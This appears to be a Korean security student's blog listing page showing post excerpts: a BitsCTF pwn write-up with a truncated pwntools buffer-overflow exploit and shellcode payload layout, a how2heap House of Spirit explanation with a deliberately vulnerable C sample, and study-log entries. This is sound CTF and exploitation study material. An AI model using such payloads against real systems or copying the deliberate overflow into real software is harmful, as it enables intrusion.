목록list (398)
y0u_bat
Bitsctf Command_Line - 20pt 풀이 할 필요도 없을정도로 쉬운 문제이긴 한데 그냥 풀이 해봅니다.. Buffer Overflow Vulnerability 띠용!..취약점이 대놓고 있고, v4 주소까지 준다.심지어 문제에 보면 no ASLR 그냥 주소 받아다가 적어 넣으면 된다. 그냥 "\x90"*24 + (v4+36 address) + "\x90"*20 + (shellcode 27byte) 이런식으로 페이로드 구성했다. Exploit.py from pwn import *s = remote("172.16.174.131",4444)stack_leak = 0x7fffffffecc0 + 36payload = "\x90"*24payload += p64(stack_leak)payload +=..
새벽C++ 프로그래밍 공부 - http://blog.eairship.kr/ 쭉 돌리기 1시~6시 #완료. 학교(오전중)잠 보충#30분완료.C++ 프로그래밍 #완료 연산자오버로딩까지 완료. 학교(오후중)secon2016 tinypad 삽질 집(문제삽질)
house of lore # 끝 - 완벽하게 이해를 못함.house of einherjar # 끝overlapping chunks #끝C++ 프로그래밍
보호되어 있는 글입니다.
보호되어 있는 글입니다.
[how2heap] House of Spirit #include #include int main(int argc, char *argv[]){ void *a = malloc (32); char buf[8]; read(0,buf,0x100); free(a); malloc(32); return 0;} 간단하게 설명하면, overflow를 통해서 a 포인터 값을 조작해서 "원하는 주소"의 free를 시키고, 다시 할당할때 "원하는 주소"를 할당하는 기술이다.buf에 fake chunk 청크를 만들고, a 포인터를 buf 주소로 덮어버리면 free(buf)가 된다.free할때 glibc 부분을 보면, free하는 청크의 뒤에 청크의 크기를 검사한다. chunk_at_offset(p,size)->size = av..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.